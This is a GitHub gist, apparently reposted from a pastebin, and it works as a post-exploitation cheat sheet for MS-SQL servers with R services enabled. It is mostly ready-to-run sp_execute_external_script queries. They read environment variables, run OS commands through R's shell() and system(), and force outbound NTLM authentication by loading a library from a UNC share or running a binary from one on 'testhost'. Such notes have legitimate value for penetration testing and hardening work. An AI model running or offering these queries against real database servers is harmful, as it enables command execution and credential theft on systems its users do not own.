Created
March 22, 2020 15:02
-
-
Save ricardojba/ab090df0b0c294f09940213e526e728f to your computer and use it in GitHub Desktop.
Executing R Scripts in MSSQL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# original https://pastebin.com/zBDnzELT | |
Starting with MS-SQL 2016 MS has allowed for the inclusion of the Microsoft R Server services, permitting the execution of R scripts in the MS-SQL environment. In order for this funcitonality to be enabled, the R services for SQL server component must be installed, the server must be reconfigured to permit sp_exectue_external_script, and a user must be granted the 'EXECUTE ANY EXTERNAL SCRIPT' permission; yes, all of this is becoming increasingly more common. | |
Once these conditions are in place, SQL users will have R capabilities in their queries through the use of sp_execute_external_script(). | |
This can be 'fun'.. | |
Sample R query in MS-SQL (from MSDN): | |
EXEC sp_execute_external_script | |
@language=N'R', | |
@script=N'OutputDataSet <- InputDataSet', | |
@input_data_1=N'SELECT 1 AS hello' | |
WITH RESULT SETS (([hello] int not null)); | |
GO | |
Get the current R environment variables: | |
EXEC sp_execute_external_script | |
@language=N'R', | |
@script=N'OutputDataSet <- data.frame(c(EnvVals=Sys.getenv()))' | |
WITH RESULT SETS (([EnvVals] TEXT)); | |
GO | |
Forced remote authentication via library inclusion: | |
EXEC sp_execute_external_script | |
@language=N'R', | |
@script=N'.libPaths("\\\\testhost\\foo\\bar");library("0mgh4x")' | |
WITH RESULT SETS (([FileLines] TEXT)); | |
GO | |
Local command execution through R shell(): | |
EXEC sp_execute_external_script | |
@language=N'R', | |
@script=N'OutputDataSet <- data.frame(shell("dir",intern=T))' | |
WITH RESULT SETS (([cmd_out] text)); | |
GO | |
Local command execution through R system(): | |
EXEC sp_execute_external_script | |
@language=N'R', | |
@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))' | |
WITH RESULT SETS (([cmd_out] text)); | |
GO | |
Forced remote authentication via UNC execution: | |
EXEC sp_execute_external_script | |
@language=N'R', | |
@script=N'OutputDataSet <- data.frame(system("cmd.exe /c \\\\testhost\\no\\bin.exe",intern=T))' | |
WITH RESULT SETS (([cmd_out] text)); | |
GO | |
As with most things in the realm of post-exploitation, if someone can do this, you've got bigger problems to worry about. | |
-whitey |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment